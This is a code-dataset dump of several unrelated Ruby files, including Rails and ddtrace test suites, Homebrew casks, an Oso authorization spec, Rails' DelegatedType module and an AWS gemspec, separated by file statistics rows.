def test_native_decimal_insert_manual_vs_automatic
correct_value = "0012345678901234567890.0123456789".to_d
connection.add_column "test_models", "wealth", :decimal, precision: "30", scale: "10"
# Do a manual insertion
if current_adapter?(:OracleAdapter)
connection.execute "insert into test_models (id, wealth) values (people_seq.nextval, 12345678901234567890.0123456789)"
elsif current_adapter?(:PostgreSQLAdapter)
connection.execute "insert into test_models (wealth) values (12345678901234567890.0123456789)"
else
connection.execute "insert into test_models (wealth) values (12345678901234567890.0123456789)"
end
# SELECT
row = TestModel.first
assert_kind_of BigDecimal, row.wealth
# If this assert fails, that means the SELECT is broken!
unless current_adapter?(:SQLite3Adapter)
assert_equal correct_value, row.wealth
end
# Reset to old state
TestModel.delete_all
# Now use the Rails insertion
TestModel.create wealth: BigDecimal.new("12345678901234567890.0123456789")
# SELECT
row = TestModel.first
assert_kind_of BigDecimal, row.wealth
# If these asserts fail, that means the INSERT (create function, or cast to SQL) is broken!
assert_equal correct_value, row.wealth
end
end
def test_add_column_with_precision_and_scale
connection.add_column "test_models", "wealth", :decimal, precision: 9, scale: 7
wealth_column = TestModel.columns_hash["wealth"]
assert_equal 9, wealth_column.precision
assert_equal 7, wealth_column.scale
end
if current_adapter?(:SQLite3Adapter)
def test_change_column_preserve_other_column_precision_and_scale
connection.add_column "test_models", "last_name", :string
connection.add_column "test_models", "wealth", :decimal, precision: 9, scale: 7
wealth_column = TestModel.columns_hash["wealth"]
assert_equal 9, wealth_column.precision
assert_equal 7, wealth_column.scale
connection.change_column "test_models", "last_name", :string, null: false
TestModel.reset_column_information
wealth_column = TestModel.columns_hash["wealth"]
assert_equal 9, wealth_column.precision
assert_equal 7, wealth_column.scale
end
end
unless current_adapter?(:SQLite3Adapter)
def test_native_types
add_column "test_models", "first_name", :string
add_column "test_models", "last_name", :string
add_column "test_models", "bio", :text
add_column "test_models", "age", :integer
add_column "test_models", "height", :float
add_column "test_models", "wealth", :decimal, precision: "30", scale: "10"
add_column "test_models", "birthday", :datetime
add_column "test_models", "favorite_day", :date
add_column "test_models", "moment_of_truth", :datetime
add_column "test_models", "male", :boolean
TestModel.create first_name: "bob", last_name: "bobsen",
bio: "I was born ....", age: 18, height: 1.78,
wealth: BigDecimal.new("12345678901234567890.0123456789"),
birthday: 18.years.ago, favorite_day: 10.days.ago,
moment_of_truth: "1782-10-10 21:40:18", male: true
bob = TestModel.first
assert_equal "bob", bob.first_name
assert_equal "bobsen", bob.last_name
assert_equal "I was born ....", bob.bio
assert_equal 18, bob.age
# Test for 30 significant digits (beyond the 16 of float), 10 of them
# after the decimal place.
assert_equal BigDecimal.new("0012345678901234567890.0123456789"), bob.wealth
assert_equal true, bob.male?
assert_equal String, bob.first_name.class
assert_equal String, bob.last_name.class
assert_equal String, bob.bio.class
assert_kind_of Integer, bob.age
assert_equal Time, bob.birthday.class
assert_equal Date, bob.favorite_day.class
assert_instance_of TrueClass, bob.male?
assert_kind_of BigDecimal, bob.wealth
end
end
if current_adapter?(:Mysql2Adapter, :PostgreSQLAdapter)
def test_out_of_range_limit_should_raise
assert_raise(ActiveRecordError) { add_column :test_models, :integer_too_big, :integer, limit: 10 }
unless current_adapter?(:PostgreSQLAdapter)
assert_raise(ActiveRecordError) { add_column :test_models, :text_too_big, :integer, limit: 0xfffffffff }
end
end
end
end
end
end
| 38.813559 | 130 | 0.673071 |
62f3c5e01b271bc4243569af51b92d40f1ef689c | 331 | class Spree::VolumePriceModel < ActiveRecord::Base
has_many :variants
has_many :volume_prices, -> { order(position: :asc) }, dependent: :destroy
accepts_nested_attributes_for :volume_prices, allow_destroy: true,
reject_if: proc { |volume_price|
volume_price[:amount].blank? && volume_price[:range].blank?
}
end
| 36.777778 | 76 | 0.734139 |
e2e5d60e05d945bd7dc21a564ad5c8e64127b344 | 6,088 | require 'spec_helper'
require 'ddtrace/contrib/analytics_examples'
require 'racecar'
require 'racecar/cli'
require 'active_support'
require 'ddtrace'
RSpec.describe 'Racecar patcher' do
let(:tracer) { get_test_tracer }
let(:configuration_options) { { tracer: tracer } }
def all_spans
tracer.writer.spans(:keep)
end
before(:each) do
Datadog.configure do |c|
c.use :racecar, configuration_options
end
end
around do |example|
# Reset before and after each example; don't allow global state to linger.
Datadog.registry[:racecar].reset_configuration!
example.run
Datadog.registry[:racecar].reset_configuration!
end
describe 'for single message processing' do
let(:topic) { 'dd_trace_test_dummy' }
let(:consumer) { 'DummyConsumer' }
let(:partition) { 1 }
let(:offset) { 2 }
let(:payload) do
{
consumer_class: consumer,
topic: topic,
partition: partition,
offset: offset
}
end
let(:span) do
all_spans.select { |s| s.name == Datadog::Contrib::Racecar::Ext::SPAN_MESSAGE }.first
end
context 'that doesn\'t raise an error' do
it 'is expected to send a span' do
ActiveSupport::Notifications.instrument('process_message.racecar', payload)
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.message')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.first_offset')).to be nil
expect(span.status).to_not eq(Datadog::Ext::Errors::STATUS)
end
end
end
context 'that raises an error' do
let(:error_class) { Class.new(StandardError) }
it 'is expected to send a span' do
# Emulate failure
begin
ActiveSupport::Notifications.instrument('process_message.racecar', payload) do
raise error_class
end
rescue error_class
nil
end
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.message')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.first_offset')).to be nil
expect(span.status).to eq(Datadog::Ext::Errors::STATUS)
end
end
end
it_behaves_like 'analytics for integration' do
before { ActiveSupport::Notifications.instrument('process_message.racecar', payload) }
let(:analytics_enabled_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_ENALBED }
let(:analytics_sample_rate_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_SAMPLE_RATE }
end
end
describe 'for batch message processing' do
let(:topic) { 'dd_trace_test_dummy_batch' }
let(:consumer) { 'DummyBatchConsumer' }
let(:partition) { 1 }
let(:offset) { 2 }
let(:message_count) { 5 }
let(:payload) do
{
consumer_class: consumer,
topic: topic,
partition: partition,
message_count: message_count,
first_offset: offset
}
end
let(:span) do
all_spans.select { |s| s.name == Datadog::Contrib::Racecar::Ext::SPAN_BATCH }.first
end
context 'that doesn\'t raise an error' do
it 'is expected to send a span' do
ActiveSupport::Notifications.instrument('process_batch.racecar', payload)
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.batch')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to be nil
expect(span.get_tag('kafka.first_offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.message_count')).to eq(message_count.to_s)
expect(span.status).to_not eq(Datadog::Ext::Errors::STATUS)
end
end
end
context 'that raises an error' do
let(:error_class) { Class.new(StandardError) }
it 'is expected to send a span' do
begin
ActiveSupport::Notifications.instrument('process_batch.racecar', payload) do
raise error_class
end
rescue error_class
nil
end
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.batch')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to be nil
expect(span.get_tag('kafka.first_offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.message_count')).to eq(message_count.to_s)
expect(span.status).to eq(Datadog::Ext::Errors::STATUS)
end
end
end
it_behaves_like 'analytics for integration' do
before { ActiveSupport::Notifications.instrument('process_batch.racecar', payload) }
let(:analytics_enabled_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_ENALBED }
let(:analytics_sample_rate_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_SAMPLE_RATE }
end
end
end
| 34.590909 | 99 | 0.639783 |
0823fca7ca22e51d53e144af4e0da0a3565b867e | 579 | cask 'blue-jeans' do
version '2.5.1.33'
sha256 '20914226694e4a0734d85f8de9a42bc81e7166af933016de66e0a82dd5383e89'
url "https://swdl.bluejeans.com/desktop-app/mac/#{version.major_minor_patch}/#{version}/BlueJeansInstaller.dmg"
name 'Blue Jeans videoconferencing'
homepage 'https://www.bluejeans.com/'
installer manual: 'BlueJeansInstaller.app'
uninstall signal: [
['TERM', 'com.bluejeansnet.Blue'],
['TERM', 'com.bluejeansnet.BlueMenulet'],
],
delete: '/Applications/Blue Jeans.app'
end
| 34.058824 | 113 | 0.658031 |
f74b643d2bc39b0986020b85ee2af6ec03d276fa | 533 | require 'rubytunes/playback'
class RubyTunes
class Fade
INCREMENT = 5
def toggle; volume > 0 ? self.out : self.in end
def in
while (current ||= volume) < 100
self.volume = (current += INCREMENT)
end
end
def out
while (current ||= volume) > 0
self.volume = (current -= INCREMENT)
end
end
private
def volume; playback.volume end
def volume=(volume); playback.volume = volume end
def playback; @playback ||= RubyTunes::Playback.new end
end
end
| 16.65625 | 59 | 0.606004 |
3898f3395b970354247db4cc8014d57d2a9e16bc | 1,544 | cask "kicad" do
version "5.1.8-0"
sha256 "a8edcae34a19afbec3c8b7ec4e38ada4d19c0c6a73a94d2f2f4e8f5b48278bbd"
# kicad-downloads.s3.cern.ch/ was verified as official when first introduced to the cask
url "https://kicad-downloads.s3.cern.ch/osx/stable/kicad-unified-#{version}-10_14.dmg"
appcast "https://kicad-downloads.s3.cern.ch/?delimiter=/&prefix=osx/stable/"
name "KiCad"
desc "Electronics design automation suite"
homepage "https://kicad.org/"
depends_on macos: ">= :mojave"
app "KiCad/kicad.app", target: "KiCad/KiCad.app"
app "KiCad/bitmap2component.app", target: "KiCad/bitmap2component.app"
app "KiCad/eeschema.app", target: "KiCad/eeschema.app"
app "KiCad/gerbview.app", target: "KiCad/gerbview.app"
app "KiCad/pcb_calculator.app", target: "KiCad/pcb_calculator.app"
app "KiCad/pcbnew.app", target: "KiCad/pcbnew.app"
app "KiCad/pl_editor.app", target: "KiCad/pl_editor.app"
artifact "kicad/help", target: "/Library/Application Support/kicad/help"
artifact "kicad/library", target: "/Library/Application Support/kicad/library"
artifact "kicad/modules", target: "/Library/Application Support/kicad/modules"
artifact "kicad/share", target: "/Library/Application Support/kicad/share"
artifact "kicad/template", target: "/Library/Application Support/kicad/template"
uninstall rmdir: [
"/Library/Application Support/kicad",
"#{appdir}/KiCad",
]
zap trash: "~/Library/Preferences/kicad"
end
| 45.411765 | 90 | 0.697539 |
4a2a1f3981b716df394b5ce4220b0291fd894406 | 8,143 | # frozen_string_literal: true
require_relative './helpers'
require 'sqlite3'
require 'active_record'
DB_FILE = 'gitclub_test.db'
RSpec.describe Oso::Oso do # rubocop:disable Metrics/BlockLength
context 'a github clone' do # rubocop:disable Metrics/BlockLength
context 'org members' do
it 'can access the right resources' do
# steve is a member of osohq
check_authz steve, 'read', Org, [osohq]
check_authz steve, 'list_repos', Org, [osohq]
check_authz steve, 'create_repos', Org, []
check_authz steve, 'read', Repo, [oso, demo]
check_authz steve, 'push', Repo, []
check_authz steve, 'pull', Repo, [oso, demo]
check_authz steve, 'create_issues', Repo, []
check_authz steve, 'list_issues', Repo, [oso, demo]
check_authz steve, 'read', Issue, [bug]
check_authz steve, 'edit', Issue, []
end
end
context 'org owners' do
it 'can access the right resources' do
# leina is an owner of osohq
check_authz leina, 'read', Org, [osohq]
check_authz leina, 'list_repos', Org, [osohq]
check_authz leina, 'create_repos', Org, [osohq]
check_authz leina, 'read', Repo, [oso, demo]
check_authz leina, 'push', Repo, [oso, demo]
check_authz leina, 'pull', Repo, [oso, demo]
check_authz leina, 'create_issues', Repo, [oso, demo]
check_authz leina, 'list_issues', Repo, [oso, demo]
check_authz leina, 'read', Issue, [bug]
check_authz leina, 'edit', Issue, [bug]
end
end
context 'repo readers' do
it 'can access the right resources' do
# graham owns apple and has read access to demo
check_authz graham, 'read', Org, [apple]
check_authz graham, 'list_repos', Org, [apple]
check_authz graham, 'create_repos', Org, [apple]
check_authz graham, 'read', Repo, [ios, demo]
check_authz graham, 'push', Repo, [ios]
check_authz graham, 'pull', Repo, [ios, demo]
check_authz graham, 'create_issues', Repo, [ios]
check_authz graham, 'list_issues', Repo, [ios, demo]
check_authz graham, 'read', Issue, [laggy]
check_authz graham, 'edit', Issue, [laggy]
end
end
context 'repo writers' do
it 'can access the right resources' do
# gabe has write access to oso
check_authz gabe, 'read', Org, []
check_authz gabe, 'list_repos', Org, []
check_authz gabe, 'create_repos', Org, []
check_authz gabe, 'read', Repo, [oso]
check_authz gabe, 'push', Repo, [oso]
check_authz gabe, 'pull', Repo, [oso]
check_authz gabe, 'create_issues', Repo, [oso]
check_authz gabe, 'list_issues', Repo, [oso]
check_authz gabe, 'read', Issue, [bug]
check_authz gabe, 'edit', Issue, [bug]
end
end
end
let(:policy_file) { File.join(__dir__, 'gitclub.polar') }
let(:apple) { Org.find 'apple' }
let(:osohq) { Org.find 'osohq' }
let(:oso) { Repo.find 'oso' }
let(:demo) { Repo.find 'demo' }
let(:ios) { Repo.find 'ios' }
let(:steve) { User.find 'steve' }
let(:leina) { User.find 'leina' }
let(:gabe) { User.find 'gabe' }
let(:graham) { User.find 'graham' }
let(:bug) { Issue.find 'bug' }
let(:laggy) { Issue.find 'laggy' }
before do # rubocop:disable Metrics/BlockLength
File.delete DB_FILE if File.exist? DB_FILE
SQLite3::Database.new(DB_FILE) do |db| # rubocop:disable Metrics/BlockLength
db.execute <<-SQL
create table orgs (
name varchar(16) not null primary key
);
SQL
db.execute <<-SQL
create table users (
name varchar(16) not null primary key,
org_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table repos (
name varchar(16) not null primary key,
org_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table issues (
name varchar(16) not null primary key,
repo_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table repo_roles (
id integer not null primary key autoincrement,
name varchar(16) not null,
repo_name varchar(16) not null,
user_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table org_roles (
id integer not null primary key autoincrement,
name varchar(16) not null,
org_name varchar(16) not null,
user_name varchar(16) not null
);
SQL
end
ActiveRecord::Base.establish_connection(
adapter: 'sqlite3',
database: DB_FILE
)
# fixtures
apple = Org.create name: 'apple'
osohq = Org.create name: 'osohq'
oso = Repo.create name: 'oso', org: osohq
demo = Repo.create name: 'demo', org: osohq
ios = Repo.create name: 'ios', org: apple
steve = User.create name: 'steve', org: osohq
leina = User.create name: 'leina', org: osohq
gabe = User.create name: 'gabe', org: osohq
graham = User.create name: 'graham', org: apple
OrgRole.create name: 'owner', user: leina, org: osohq
OrgRole.create name: 'member', user: steve, org: osohq
OrgRole.create name: 'owner', user: graham, org: apple
RepoRole.create name: 'writer', user: gabe, repo: oso
RepoRole.create name: 'reader', user: graham, repo: demo
Issue.create name: 'bug', repo: oso
Issue.create name: 'laggy', repo: ios
subject.register_class(
User,
fields: {
name: String,
org_name: String,
org: Relation.new(
kind: 'one',
other_type: 'Org',
my_field: 'org_name',
other_field: 'name'
)
}
)
subject.register_class(
Org,
fields: {
name: String,
users: Relation.new(
kind: 'many',
other_type: 'User',
my_field: 'name',
other_field: 'org_name'
),
repos: Relation.new(
kind: 'many',
other_type: 'Repo',
my_field: 'name',
other_field: 'org_name'
)
}
)
subject.register_class(
Repo,
fields: {
name: String,
org_name: String,
org: Relation.new(
kind: 'one',
other_type: 'Org',
my_field: 'org_name',
other_field: 'name'
),
roles: Relation.new(
kind: 'many',
other_type: 'Role',
my_field: 'name',
other_field: 'user_name'
)
}
)
subject.register_class(
Issue,
fields: {
name: String,
repo_name: String,
repo: Relation.new(
kind: 'one',
other_type: 'Repo',
my_field: 'repo_name',
other_field: 'name'
)
}
)
subject.load_files [policy_file]
end
end
class User < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
belongs_to :org, foreign_key: :org_name
has_many :org_roles, foreign_key: :user_name
has_many :repo_roles, foreign_key: :user_name
end
class Repo < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
belongs_to :org, foreign_key: :org_name
has_many :issues, foreign_key: :repo_name
has_many :repo_roles, foreign_key: :repo_name
end
class Org < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
has_many :users, foreign_key: :org_name
has_many :repos, foreign_key: :org_name
has_many :org_roles, foreign_key: :org_name
end
class Issue < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
belongs_to :repo, foreign_key: :repo_name
end
class RepoRole < ActiveRecord::Base
include DFH::ActiveRecordFetcher
belongs_to :user, foreign_key: :user_name
belongs_to :repo, foreign_key: :repo_name
end
class OrgRole < ActiveRecord::Base
include DFH::ActiveRecordFetcher
belongs_to :user, foreign_key: :user_name
belongs_to :org, foreign_key: :org_name
end
| 28.274306 | 80 | 0.603217 |
1cde7443609016ae7aa2c8cb334becc7d0b0d05b | 107 | require "keima/version"
require "keima/client"
require "json"
module Keima
# Your code goes here...
end
| 13.375 | 26 | 0.728972 |
e2609a85d4b97b085c2cb6839510e4cbfac4362f | 10,035 | # frozen_string_literal: true
require "active_support/core_ext/string/inquiry"
module ActiveRecord
# == Delegated types
#
# Class hierarchies can map to relational database tables in many ways. Active Record, for example, offers
# purely abstract classes, where the superclass doesn't persist any attributes, and single-table inheritance,
# where all attributes from all levels of the hierarchy are represented in a single table. Both have their
# places, but neither are without their drawbacks.
#
# The problem with purely abstract classes is that all concrete subclasses must persist all the shared
# attributes themselves in their own tables (also known as class-table inheritance). This makes it hard to
# do queries across the hierarchy. For example, imagine you have the following hierarchy:
#
# Entry < ApplicationRecord
# Message < Entry
# Comment < Entry
#
# How do you show a feed that has both +Message+ and +Comment+ records, which can be easily paginated?
# Well, you can't! Messages are backed by a messages table and comments by a comments table. You can't
# pull from both tables at once and use a consistent OFFSET/LIMIT scheme.
#
# You can get around the pagination problem by using single-table inheritance, but now you're forced into
# a single mega table with all the attributes from all subclasses. No matter how divergent. If a Message
# has a subject, but the comment does not, well, now the comment does anyway! So STI works best when there's
# little divergence between the subclasses and their attributes.
#
# But there's a third way: Delegated types. With this approach, the "superclass" is a concrete class
# that is represented by its own table, where all the superclass attributes that are shared amongst all the
# "subclasses" are stored. And then each of the subclasses have their own individual tables for additional
# attributes that are particular to their implementation. This is similar to what's called multi-table
# inheritance in Django, but instead of actual inheritance, this approach uses delegation to form the
# hierarchy and share responsibilities.
#
# Let's look at that entry/message/comment example using delegated types:
#
# # Schema: entries[ id, account_id, creator_id, created_at, updated_at, entryable_type, entryable_id ]
# class Entry < ApplicationRecord
# belongs_to :account
# belongs_to :creator
# delegated_type :entryable, types: %w[ Message Comment ]
# end
#
# module Entryable
# extend ActiveSupport::Concern
#
# included do
# has_one :entry, as: :entryable, touch: true
# end
# end
#
# # Schema: messages[ id, subject ]
# class Message < ApplicationRecord
# include Entryable
# has_rich_text :content
# end
#
# # Schema: comments[ id, content ]
# class Comment < ApplicationRecord
# include Entryable
# end
#
# As you can see, neither +Message+ nor +Comment+ are meant to stand alone. Crucial metadata for both classes
# resides in the +Entry+ "superclass". But the +Entry+ absolutely can stand alone in terms of querying capacity
# in particular. You can now easily do things like:
#
# Account.find(1).entries.order(created_at: :desc).limit(50)
#
# Which is exactly what you want when displaying both comments and messages together. The entry itself can
# be rendered as its delegated type easily, like so:
#
# # entries/_entry.html.erb
# <%= render "entries/entryables/#{entry.entryable_name}", entry: entry %>
#
# # entries/entryables/_message.html.erb
# <div class="message">
# Posted on <%= entry.created_at %> by <%= entry.creator.name %>: <%= entry.message.content %>
# </div>
#
# # entries/entryables/_comment.html.erb
# <div class="comment">
# <%= entry.creator.name %> said: <%= entry.comment.content %>
# </div>
#
# == Sharing behavior with concerns and controllers
#
# The entry "superclass" also serves as a perfect place to put all that shared logic that applies to both
# messages and comments, and which acts primarily on the shared attributes. Imagine:
#
# class Entry < ApplicationRecord
# include Eventable, Forwardable, Redeliverable
# end
#
# Which allows you to have controllers for things like +ForwardsController+ and +RedeliverableController+
# that both act on entries, and thus provide the shared functionality to both messages and comments.
#
# == Creating new records
#
# You create a new record that uses delegated typing by creating the delegator and delegatee at the same time,
# like so:
#
# Entry.create! entryable: Comment.new(content: "Hello!"), creator: Current.user
#
# If you need more complicated composition, or you need to perform dependent validation, you should build a factory
# method or class to take care of the complicated needs. This could be as simple as:
#
# class Entry < ApplicationRecord
# def self.create_with_comment(content, creator: Current.user)
# create! entryable: Comment.new(content: content), creator: creator
# end
# end
#
# == Adding further delegation
#
# The delegated type shouldn't just answer the question of what the underlying class is called. In fact, that's
# an anti-pattern most of the time. The reason you're building this hierarchy is to take advantage of polymorphism.
# So here's a simple example of that:
#
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment ]
# delegate :title, to: :entryable
# end
#
# class Message < ApplicationRecord
# def title
# subject
# end
# end
#
# class Comment < ApplicationRecord
# def title
# content.truncate(20)
# end
# end
#
# Now you can list a bunch of entries, call +Entry#title+, and polymorphism will provide you with the answer.
module DelegatedType
# Defines this as a class that'll delegate its type for the passed +role+ to the class references in +types+.
# That'll create a polymorphic +belongs_to+ relationship to that +role+, and it'll add all the delegated
# type convenience methods:
#
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment ], dependent: :destroy
# end
#
# Entry#entryable_class # => +Message+ or +Comment+
# Entry#entryable_name # => "message" or "comment"
# Entry.messages # => Entry.where(entryable_type: "Message")
# Entry#message? # => true when entryable_type == "Message"
# Entry#message # => returns the message record, when entryable_type == "Message", otherwise nil
# Entry#message_id # => returns entryable_id, when entryable_type == "Message", otherwise nil
# Entry.comments # => Entry.where(entryable_type: "Comment")
# Entry#comment? # => true when entryable_type == "Comment"
# Entry#comment # => returns the comment record, when entryable_type == "Comment", otherwise nil
# Entry#comment_id # => returns entryable_id, when entryable_type == "Comment", otherwise nil
#
# You can also declare namespaced types:
#
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment Access::NoticeMessage ], dependent: :destroy
# end
#
# Entry.access_notice_messages
# entry.access_notice_message
# entry.access_notice_message?
#
# === Options
#
# The +options+ are passed directly to the +belongs_to+ call, so this is where you declare +dependent+ etc.
# The following options can be included to specialize the behavior of the delegated type convenience methods.
#
# [:foreign_key]
# Specify the foreign key used for the convenience methods. By default this is guessed to be the passed
# +role+ with an "_id" suffix. So a class that defines a
# <tt>delegated_type :entryable, types: %w[ Message Comment ]</tt> association will use "entryable_id" as
# the default <tt>:foreign_key</tt>.
# [:primary_key]
# Specify the method that returns the primary key of associated object used for the convenience methods.
# By default this is +id+.
#
# Option examples:
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment ], primary_key: :uuid, foreign_key: :entryable_uuid
# end
#
# Entry#message_uuid # => returns entryable_uuid, when entryable_type == "Message", otherwise nil
# Entry#comment_uuid # => returns entryable_uuid, when entryable_type == "Comment", otherwise nil
def delegated_type(role, types:, **options)
belongs_to role, options.delete(:scope), **options.merge(polymorphic: true)
define_delegated_type_methods role, types: types, options: options
end
private
def define_delegated_type_methods(role, types:, options:)
primary_key = options[:primary_key] || "id"
role_type = "#{role}_type"
role_id = options[:foreign_key] || "#{role}_id"
define_method "#{role}_class" do
public_send("#{role}_type").constantize
end
define_method "#{role}_name" do
public_send("#{role}_class").model_name.singular.inquiry
end
types.each do |type|
scope_name = type.tableize.gsub("/", "_")
singular = scope_name.singularize
query = "#{singular}?"
scope scope_name, -> { where(role_type => type) }
define_method query do
public_send(role_type) == type
end
define_method singular do
public_send(role) if public_send(query)
end
define_method "#{singular}_#{primary_key}" do
public_send(role_id) if public_send(query)
end
end
end
end
end
| 43.441558 | 117 | 0.677927 |
e877f1a1c7793214a16d3dccbf14c57555a0bc4d | 249 | class AddUnaccentExtension < ActiveRecord::Migration[5.2]
def up
execute "create extension unaccent"
execute "create extension pg_trgm"
end
def down
execute "drop extension unaccent"
execute "drop extension pg_trgm"
end
end
| 20.75 | 57 | 0.73494 |
e8aeb93a2ba3e082336af260b525207745feabc7 | 1,972 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Deploy-ECS.gitlab-ci.yml' do
subject(:template) { Gitlab::Template::GitlabCiYmlTemplate.find('AWS/Deploy-ECS') }
describe 'the created pipeline' do
let(:default_branch) { project.default_branch_or_main }
let(:pipeline_branch) { default_branch }
let(:project) { create(:project, :auto_devops, :custom_repo, files: { 'README.md' => '' }) }
let(:user) { project.owner }
let(:service) { Ci::CreatePipelineService.new(project, user, ref: pipeline_branch ) }
let(:pipeline) { service.execute!(:push) }
let(:build_names) { pipeline.builds.pluck(:name) }
let(:platform_target) { 'ECS' }
before do
create(:ci_variable, project: project, key: 'AUTO_DEVOPS_PLATFORM_TARGET', value: platform_target)
stub_ci_pipeline_yaml_file(template.content)
allow_any_instance_of(Ci::BuildScheduleWorker).to receive(:perform).and_return(true)
allow(project).to receive(:default_branch).and_return(default_branch)
end
shared_examples 'no pipeline yaml error' do
it 'does not have any error' do
expect(pipeline.has_yaml_errors?).to be_falsey
end
end
it_behaves_like 'no pipeline yaml error'
it 'creates the expected jobs' do
expect(build_names).to include('production_ecs')
end
context 'when running a pipeline for a branch' do
let(:pipeline_branch) { 'test_branch' }
before do
project.repository.create_branch(pipeline_branch, default_branch)
end
it_behaves_like 'no pipeline yaml error'
it 'creates the expected jobs' do
expect(build_names).to include('review_ecs', 'stop_review_ecs')
end
context 'when deploying to ECS Fargate' do
let(:platform_target) { 'FARGATE' }
it 'creates the expected jobs' do
expect(build_names).to include('review_fargate', 'stop_review_fargate')
end
end
end
end
end
| 32.866667 | 104 | 0.689655 |
2656f5005960f79b3af61f24468aed221508e748 | 1,946 | class QuickRegistration
include ActiveAttr::Model, PasswordGenerator, HostingServicesGenerators
attribute :domain
attribute :ns1_ip_address
attribute :ns2_ip_address
attribute :user
attribute :login
attribute :email
attribute :apache_variation
attribute :ip_address
attribute :with_ssh, type: Boolean
attribute :with_ftp, type: Boolean
attribute :with_mysql, type: Boolean
attribute :with_pgsql, type: Boolean
attribute :with_email, type: Boolean
include QuickRegistrationValidations
def process_registration
return unless valid?
generate_all_passwords
user = create_user
create_all_services(user)
send_email_to_user(user)
end
private
def generate_all_passwords
@user_password = generate_random_password
@ssh_password = generate_random_password if with_ssh
@ftp_password = generate_random_password if with_ftp
@mysql_password = generate_random_password if with_mysql
@pgsql_password = generate_random_password if with_pgsql
end
def create_all_services(user)
system_user = create_system_user(login: login, user: user)
create_domain(user)
apache = create_apache(system_user: system_user, user: user)
# We really need to create system_user two times. First time it is required
# for apache to be created, second time it updates chroot_directory for
# system_user.
system_user.create_chef_task(:create)
create_ftp(system_user) if with_ftp
create_mysql(apache) if with_mysql
create_pgsql(apache) if with_pgsql
create_email if with_email
end
def send_email_to_user(user)
NotificationsMailer.registration(
email: user.email,
login: login,
user_password: @user_password,
domain: domain,
ssh_password: @ssh_password,
ftp_password: @ftp_password,
mysql_password: @mysql_password,
pgsql_password: @pgsql_password
).deliver_now
end
end
| 27.8 | 79 | 0.750257 |
1a0f3be4f497fab83cb6e49241b2acad39e26564 | 869 | class Workshop < ApplicationRecord
geocoded_by :address
after_validation :geocode, if: :will_save_change_to_address?
include PgSearch
pg_search_scope :search_by_category, :against => [:category]
pg_search_scope :search_by_area, :against => [:area]
acts_as_votable
mount_uploader :photo, PhotoUploader
validates :name, presence: true, uniqueness: true
validates :area, presence: true
validates :capacity, numericality: { only_integer: true }
validates :price, numericality: { only_integer: true }
has_many :bookings, dependent: :destroy
has_many :notes, dependent: :destroy
belongs_to :user, optional: true
CATEGORIES = %w(audio
ceramics
design
digital
drawing
nature
music
online
painting
photography
printmaking
video
performance
social
textiles
theory
reading
tour
writing
sculpture
woodwork
other
)
end
| 17.734694 | 62 | 0.757192 |
086b1cc0ea2b04fa02f7614bcea09ec14ddf00e9 | 1,264 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-lexruntimev2'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Lex Runtime V2'
spec.description = 'Official AWS Ruby gem for Amazon Lex Runtime V2 (Lex Runtime V2). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-lexruntimev2',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-lexruntimev2/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.112.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
end
